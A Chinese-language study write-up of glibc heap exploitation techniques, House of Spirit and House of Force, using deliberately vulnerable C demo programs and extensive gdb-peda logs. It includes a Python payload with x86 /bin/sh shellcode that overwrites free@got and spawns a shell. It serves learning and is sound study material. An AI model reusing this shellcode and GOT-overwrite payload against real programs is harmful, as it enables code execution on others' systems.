Malloc-Maleficarum-复盘

1.HOS

伪造堆块，最终让 malloc() 返回栈上的地址。

这份源码来自这里
但是我这边复现他这个有点问题，原因应该是 gcc 版本不同；这里只是为了搞明白原理，直接在 gdb 里用 set 命令手动改写内存值就可以了。
这里附上gdb的调试过程。

# muhe @ ubuntu in ~/Desktop/study [2:54:31] 
$ ls
hos hos.c
# muhe @ ubuntu in ~/Desktop/study [2:54:33]
$ cat hos.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void fvuln(char *str1, int age)
{
    /* Deliberately vulnerable demo routine (heap technique #1 on this page).
     * str1 (argv[1] from main) is copied into a fixed 32-byte stack buffer
     * with no bound, so a longer argument overwrites the locals the compiler
     * placed at higher addresses than `name` -- the gdb log shows ptr1 turning
     * into 0x63636363 ("cccc") after the copy. The corrupted ptr1 is then
     * handed to free(), and the next malloc() returns whatever that forged
     * chunk points at. The fix is a bounded copy, e.g.
     * snprintf(name, sizeof name, "%s", str1), plus a check of its result. */
    char *ptr1;
    int local_age;
    char name[32];
    char *ptr2;
    local_age = age;
    ptr1 = (char *) malloc(256);      /* result is not checked for NULL */
    printf("\nPTR1 = [ %p ]", ptr1);
    strcpy(name, str1);               /* unbounded: more than 31 bytes overflows `name` into the other locals */
    printf("\nPTR1 = [ %p ]\n", ptr1);
    free(ptr1);                       /* frees whatever value the overflow left in ptr1 */
    ptr2 = (char *) malloc(40);       /* first allocation after that free; result not checked */
    /* size passed is 39, one less than the 40 bytes allocated (harmless, but easy to misread) */
    snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
    printf("\n%s\n", ptr2);
    /* ptr2 is never freed */
}
int main(int argc, char *argv[])
{
    /* pad is never read; presumably it only exists to shape the stack frame
     * so the layout matches the original write-up -- TODO confirm. */
    int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
    if (argc == 3)
        fvuln(argv[1], atoi(argv[2]));   /* argv[1] is passed on unchecked; atoi() reports no error for bad input */
    return 0;
}
# muhe @ ubuntu in ~/Desktop/study [2:54:35] 
$ gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos -g
# muhe @ ubuntu in ~/Desktop/study [2:54:45]
$ gdb ./hos -q
Reading symbols from ./hos...done.
gdb-peda$ pdisass fvuln
Dump of assembler code for function fvuln:
0x080484fb <+0>: push ebp
0x080484fc <+1>: mov ebp,esp
0x080484fe <+3>: sub esp,0x2c
0x08048501 <+6>: mov eax,DWORD PTR [ebp+0xc]
0x08048504 <+9>: mov DWORD PTR [ebp-0x4],eax
0x08048507 <+12>: push 0x100
0x0804850c <+17>: call 0x80483b0 <malloc@plt>
0x08048511 <+22>: add esp,0x4
0x08048514 <+25>: mov DWORD PTR [ebp-0x8],eax
0x08048517 <+28>: push DWORD PTR [ebp-0x8]
0x0804851a <+31>: push 0x8048660
0x0804851f <+36>: call 0x8048380 <printf@plt>
0x08048524 <+41>: add esp,0x8
0x08048527 <+44>: push DWORD PTR [ebp+0x8]
0x0804852a <+47>: lea eax,[ebp-0x2c]
0x0804852d <+50>: push eax
0x0804852e <+51>: call 0x80483a0 <strcpy@plt>
0x08048533 <+56>: add esp,0x8
0x08048536 <+59>: push DWORD PTR [ebp-0x8]
0x08048539 <+62>: push 0x804866f
0x0804853e <+67>: call 0x8048380 <printf@plt>
0x08048543 <+72>: add esp,0x8
0x08048546 <+75>: push DWORD PTR [ebp-0x8]
0x08048549 <+78>: call 0x8048390 <free@plt>
0x0804854e <+83>: add esp,0x4
0x08048551 <+86>: push 0x28
0x08048553 <+88>: call 0x80483b0 <malloc@plt>
0x08048558 <+93>: add esp,0x4
0x0804855b <+96>: mov DWORD PTR [ebp-0xc],eax
0x0804855e <+99>: push DWORD PTR [ebp-0x4]
0x08048561 <+102>: lea eax,[ebp-0x2c]
0x08048564 <+105>: push eax
0x08048565 <+106>: push 0x804867f
0x0804856a <+111>: push 0x27
0x0804856c <+113>: push DWORD PTR [ebp-0xc]
0x0804856f <+116>: call 0x80483d0 <snprintf@plt>
0x08048574 <+121>: add esp,0x14
0x08048577 <+124>: push DWORD PTR [ebp-0xc]
0x0804857a <+127>: push 0x8048692
0x0804857f <+132>: call 0x8048380 <printf@plt>
0x08048584 <+137>: add esp,0x8
0x08048587 <+140>: nop
0x08048588 <+141>: leave
0x08048589 <+142>: ret
End of assembler dump.
gdb-peda$ b *0x0804850c
Breakpoint 1 at 0x804850c: file hos.c, line 14.
gdb-peda$ b *0x0804852e
Breakpoint 2 at 0x804852e: file hos.c, line 16.
gdb-peda$ b *0x08048549
Breakpoint 3 at 0x8048549: file hos.c, line 19.
gdb-peda$ b *0x08048553
Breakpoint 4 at 0x8048553: file hos.c, line 21.
gdb-peda$ r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
Starting program: /home/muhe/Desktop/study/hos aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
 [----------------------------------registers-----------------------------------]
EAX: 0x14
EBX: 0x0
ECX: 0x0
EDX: 0x14
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x100
EIP: 0x804850c (<fvuln+17>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048501 <fvuln+6>: mov eax,DWORD PTR [ebp+0xc]
0x8048504 <fvuln+9>: mov DWORD PTR [ebp-0x4],eax
0x8048507 <fvuln+12>: push 0x100
=> 0x804850c <fvuln+17>: call 0x80483b0 <malloc@plt>
0x8048511 <fvuln+22>: add esp,0x4
0x8048514 <fvuln+25>: mov DWORD PTR [ebp-0x8],eax
0x8048517 <fvuln+28>: push DWORD PTR [ebp-0x8]
0x804851a <fvuln+31>: push 0x8048660
Guessed arguments:
arg[0]: 0x100
arg[1]: 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x100
0004| 0xffffd520 --> 0x0
0008| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0012| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0016| 0xffffd52c --> 0x0
0020| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0024| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
0028| 0xffffd538 --> 0xffffd851 --> 0x58003032 ('20')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804850c in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:14
14 ptr1 = (char *) malloc(256);
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd520 --> 0x0
EBX: 0x0
ECX: 0x7fffffec
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd518 --> 0xffffd520 --> 0x0
EIP: 0x804852e (<fvuln+51>: call 0x80483a0 <strcpy@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048527 <fvuln+44>: push DWORD PTR [ebp+0x8]
0x804852a <fvuln+47>: lea eax,[ebp-0x2c]
0x804852d <fvuln+50>: push eax
=> 0x804852e <fvuln+51>: call 0x80483a0 <strcpy@plt>
0x8048533 <fvuln+56>: add esp,0x8
0x8048536 <fvuln+59>: push DWORD PTR [ebp-0x8]
0x8048539 <fvuln+62>: push 0x804866f
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd520 --> 0x0
arg[1]: 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
[------------------------------------stack-------------------------------------]
0000| 0xffffd518 --> 0xffffd520 --> 0x0
0004| 0xffffd51c --> 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd520 --> 0x0
0012| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0016| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0020| 0xffffd52c --> 0x0
0024| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0028| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804852e in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:16
16 strcpy(name, str1);
gdb-peda$ c
Continuing.
PTR1 = [ 0x804b008 ]
PTR1 = [ 0x63636363 ]

这里伪造堆块，但为了通过 malloc() 对 fastbin 的检查，还需要再设置一下下一个块。

 [----------------------------------registers-----------------------------------]
EAX: 0x17
EBX: 0x0
ECX: 0x7fffffeb
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
EIP: 0x8048549 (<fvuln+78>: call 0x8048390 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
=> 0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
Guessed arguments:
arg[0]: 0x63636363 ('cccc')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
0004| 0xffffd520 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd524 ('a' <repeats 28 times>, "bbbbcccc")
0012| 0xffffd528 ('a' <repeats 24 times>, "bbbbcccc")
0016| 0xffffd52c ('a' <repeats 20 times>, "bbbbcccc")
0020| 0xffffd530 ('a' <repeats 16 times>, "bbbbcccc")
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x08048549 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:19
19 free(ptr1);
gdb-peda$ x/10wx $esp
0xffffd51c: 0x63636363 0x61616161 0x61616161 0x61616161
0xffffd52c: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd53c: 0x61616161 0x62626262
gdb-peda$ set *(int*)0xffffd51c = 0xffffd530
gdb-peda$ x/10wx 0xffffd530 - 8
0xffffd528: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd538: 0x61616161 0x61616161 0x62626262 0x63636363
0xffffd548: 0x00000000 0xffffd588
gdb-peda$ set *(int*)0xffffd528=0x0
gdb-peda$ set *(int*)0xffffd52c=0x31
gdb-peda$ x/10wx 0xffffd530 - 8 + 0x30
0xffffd558: 0x00000014 0x00000000 0x00000000 0x00000000
0xffffd568: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd578: 0x0000000a 0x00000000
gdb-peda$ set *(int*)0xffffd558 = 0x31
gdb-peda$ set *(int*)0xffffd55c = 0x30
gdb-peda$ ni
 [----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0xffffd530 --> 0x0
EIP: 0x804854e (<fvuln+83>: add esp,0x4)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
=> 0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0xffffd530 --> 0x0
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804854e 19 free(ptr1);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x8048551 (<fvuln+86>: push 0x28)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
=> 0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048553 (<fvuln+88>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
=> 0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
Guessed arguments:
arg[0]: 0x28 ('(')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 4, 0x08048553 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x31) at hos.c:21
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni

这里，malloc() 返回了栈上的地址。

 [----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048558 (<fvuln+93>: add esp,0x4)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
=> 0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048558 21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x804855b (<fvuln+96>: mov DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
=> 0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
0x8048565 <fvuln+106>: push 0x804867f
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855b 21 ptr2 = (char *) malloc(40);
gdb-peda$

2.hop TBU

3.hom TBU

4.hof
控制 top chunk 的 size 字段，之后再经过两次 malloc()，就能分配到指定的位置。

/*
House of force vulnerable program.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
    /* Deliberately vulnerable demo from the original write-up. The bracketed
     * [n] labels at the start of the lines below are the write-up's step
     * numbers, not C -- strip them before compiling. Untrusted input reaches
     * the allocator twice: argv[1] is copied into a 256-byte chunk with no
     * bound, so it can run into the header of the chunk that follows it
     * (the top chunk in the gdb log), and argv[2] is used verbatim as the
     * size of the next allocation. A hardened version would length-check
     * argv[1] against the buffer, range-check the parsed size, and check
     * every malloc() result, none of which happens here. */
    char *buf1, *buf2, *buf3;
    if (argc != 4) {
        printf("Usage Error\n");
        return;   /* bare `return;` in a non-void function is a constraint violation; should return a status, e.g. 1 */
    }
    [1]buf1 = malloc(256);                               /* result not checked */
    [2]strcpy(buf1, argv[1]); /* Prereq 1 */             /* unbounded copy into the 256-byte chunk */
    [3]buf2 = malloc(strtoul(argv[2], NULL, 16)); /* Prereq 2 */  /* caller-chosen size, no range check, result not checked */
    [4]buf3 = malloc(256); /* Prereq 3 */                /* result not checked */
    [5]strcpy(buf3, argv[3]); /* Prereq 3 */             /* unbounded copy into wherever buf3 landed */
    [6]free(buf3);
    free(buf2);
    free(buf1);
    return 0;
}
/*
free@got entry 0x08049830
top 0x0804a108
size = ((0x08049830 - 0x8) - 0x0804a108) -0x8 = 0xFFFFF718
python -c 'print "A"*260 + "\xff\xff\xff\xff" +" "+"0xFFFFF718"+" "+"AAAA"' > 1
control eip --> 0x41414141
*/

gdb log 如下，可以看到 buf3 分配到了 free@got：

 [----------------------------------registers-----------------------------------]
EAX: 0x8049830 --> 0x8048346 (<free@plt+6>: push 0x0)
EBX: 0xffffd340 --> 0x4
ECX: 0xf7fb9780 --> 0x0
EDX: 0x8049830 --> 0x8048346 (<free@plt+6>: push 0x0)
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd310 --> 0x4
EIP: 0x804853f (<main+148>: mov DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048532 <main+135>: push 0x100
0x8048537 <main+140>: call 0x8048360 <malloc@plt>
0x804853c <main+145>: add esp,0x10
=> 0x804853f <main+148>: mov DWORD PTR [ebp-0xc],eax
0x8048542 <main+151>: mov eax,DWORD PTR [ebx+0x4]
0x8048545 <main+154>: add eax,0xc
0x8048548 <main+157>: mov eax,DWORD PTR [eax]
0x804854a <main+159>: sub esp,0x8
[------------------------------------stack-------------------------------------]
0000| 0xffffd310 --> 0x4
0004| 0xffffd314 --> 0x804a008 ('A' <repeats 200 times>...)
0008| 0xffffd318 --> 0x804a110 --> 0x0
0012| 0xffffd31c --> 0x80485c1 (<__libc_csu_init+33>: lea eax,[ebx-0xf8])
0016| 0xffffd320 --> 0xffffd340 --> 0x4
0020| 0xffffd324 --> 0x0
0024| 0xffffd328 --> 0x0
0028| 0xffffd32c --> 0xf7e22637 (<__libc_start_main+247>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804853f 18 buf3 = malloc(256); /* Prereq 3 */
gdb-peda$

再往后，到 strcpy() 之后：

 [----------------------------------registers-----------------------------------]
EAX: 0x8049830 ("AAAA")
EBX: 0xffffd340 --> 0x4
ECX: 0xffffd722 ("AAAA")
EDX: 0x8049830 ("AAAA")
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd2fc --> 0x8048564 (<main+185>: add esp,0x10)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd2fc --> 0x8048564 (<main+185>: add esp,0x10)
0004| 0xffffd300 --> 0x8049830 ("AAAA")
0008| 0xffffd304 --> 0xffffd722 ("AAAA")
0012| 0xffffd308 --> 0x10
0016| 0xffffd30c --> 0x80485eb (<__libc_csu_init+75>: add edi,0x1)
0020| 0xffffd310 --> 0x4
0024| 0xffffd314 --> 0x804a008 ('A' <repeats 200 times>...)
0028| 0xffffd318 --> 0x804a110 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$

改一下 payload：

# Python 2 (print statement). Builds the three space-separated argv values the
# write-up's command line hands to the demo program above; argv[2] stays as hex
# text because the program parses it with strtoul(..., 16).
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
shellcode += "\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0"
shellcode += "\x0b\xcd\x80"
payload = ""
payload += "\x90"*10 + shellcode + "A"*(260-10-len(shellcode))  # argv[1], padded to 260 bytes
payload += "\xff\xff\xff\xff"
payload += " " + "0xFFFFF718"         # argv[2]
payload += " " + "\x08\xa0\x04\x08"   # argv[3]
print payload

gdb log 如下：

[----------------------------------registers-----------------------------------]
EAX: 0x8049830 --> 0x804a008 --> 0x90909090
EBX: 0xffffd340 --> 0x4
ECX: 0xffffd721 --> 0x804a008 --> 0x90909090
EDX: 0x8049830 --> 0x804a008 --> 0x90909090
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd300 --> 0x8049830 --> 0x804a008 --> 0x90909090
EIP: 0x804855f (<main+180>: call 0x8048340 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048556 <main+171>: add esp,0x10
0x8048559 <main+174>: sub esp,0xc
0x804855c <main+177>: push DWORD PTR [ebp-0xc]
=> 0x804855f <main+180>: call 0x8048340 <free@plt>
0x8048564 <main+185>: add esp,0x10
0x8048567 <main+188>: sub esp,0xc
0x804856a <main+191>: push DWORD PTR [ebp-0x10]
0x804856d <main+194>: call 0x8048340 <free@plt>
Guessed arguments:
arg[0]: 0x8049830 --> 0x804a008 --> 0x90909090
[------------------------------------stack-------------------------------------]
0000| 0xffffd300 --> 0x8049830 --> 0x804a008 --> 0x90909090
0004| 0xffffd304 --> 0xffffd721 --> 0x804a008 --> 0x90909090
0008| 0xffffd308 --> 0x10
0012| 0xffffd30c --> 0x80485eb (<__libc_csu_init+75>: add edi,0x1)
0016| 0xffffd310 --> 0x4
0020| 0xffffd314 --> 0x804a008 --> 0x90909090
0024| 0xffffd318 --> 0x804a110 --> 0x0
0028| 0xffffd31c --> 0x8049830 --> 0x804a008 --> 0x90909090
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855f 21 free(buf3);
gdb-peda$ pdisass 0x8048340
Dump of assembler code from 0x8048340 to 0x8048360:
0x08048340 <free@plt+0>: jmp DWORD PTR ds:0x8049830
0x08048346 <free@plt+6>: push 0x0
0x0804834b <free@plt+11>: jmp 0x8048330
0x08048350 <strcpy@plt+0>: jmp DWORD PTR ds:0x8049834
0x08048356 <strcpy@plt+6>: push 0x8
0x0804835b <strcpy@plt+11>: jmp 0x8048330
End of assembler dump.
gdb-peda$ pdisass 0x804a008
Dump of assembler code from 0x804a008 to 0x804a028:
0x0804a008: nop
0x0804a009: nop
0x0804a00a: nop
0x0804a00b: nop
0x0804a00c: nop
0x0804a00d: nop
0x0804a00e: nop
0x0804a00f: nop
0x0804a010: nop
0x0804a011: nop
0x0804a012: xor eax,eax
0x0804a014: push eax
0x0804a015: push 0x68732f2f
0x0804a01a: push 0x6e69622f
0x0804a01f: mov ebx,esp
0x0804a021: push eax
0x0804a022: mov edx,esp
0x0804a024: push ebx
0x0804a025: mov ecx,esp
0x0804a027: mov al,0xb
End of assembler dump.
gdb-peda$ c
Continuing.
process 9711 is executing new program: /bin/dash
Error in re-setting breakpoint 1: Function "main" not defined.
$

5.hol TBU


6.hoc TBU